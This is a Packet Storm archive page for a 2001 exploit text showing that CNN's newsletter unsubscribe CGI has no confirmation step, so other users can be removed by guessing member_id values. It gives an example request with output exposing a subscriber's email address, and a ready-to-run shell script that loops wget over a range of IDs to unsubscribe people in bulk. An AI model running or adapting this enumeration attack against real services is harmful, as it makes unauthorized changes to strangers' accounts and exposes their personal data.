exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cnn_unsubscribe_bot.txt

cnn_unsubscribe_bot.txt
Posted Aug 30, 2001
Authored by Jay Daniels

The CNN Unsubscribe Bot can Un-Subscribe other users from CNN's distribution list by placing a random number at the end of unsubscribe cgi URL's member_id.

tags | exploit, cgi
SHA-256 | 53bf6534606c7051e8350cb44d7f0223e19984b7353c2376361378fa040f169f

cnn_unsubscribe_bot.txt

Change Mirror Download
CNN List Un-Subscribe bot

# Date: 8/22/01
# Author: Jay Daniels <psaux@zdnetonebox.com>


PROBLEM:
Anyone can Un-Subscribe other users from CNN's distribution list by placing a
random number at the end of unsubscribe cgi URL's member_id.

CAUSE: There is no confirmation request! I can't remember if there is a
confirmation request when subscribing, if not then a similar method could be
used to post/subscribe others without their knowledge.

[example: quicknews]

http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=3465865

[output]
>User removed
>The email address jay@thecompany.com has been removed from the e-wiretext
>distribution list(s). This change should take effect within 24 hours.

I do not know the exact range for member_id so you can just start at [start_memid]
and go up.


Now you could make a simple shell script to do this using wget:

#!/bin/sh
# you may want to use a proxy or adjust wget options see %wget -h

# path for wget
path="/usr/bin"


if [ $# != 2 ]; then
echo "Usage: $0 [start_memid] [stop_memid]"
exit 1
fi


count=$(($1))

while [ "$count" -le "$2" ]; do
$path/wget -a $0.log http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=$count
count=$(($count + 1))
done

exit 0
Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close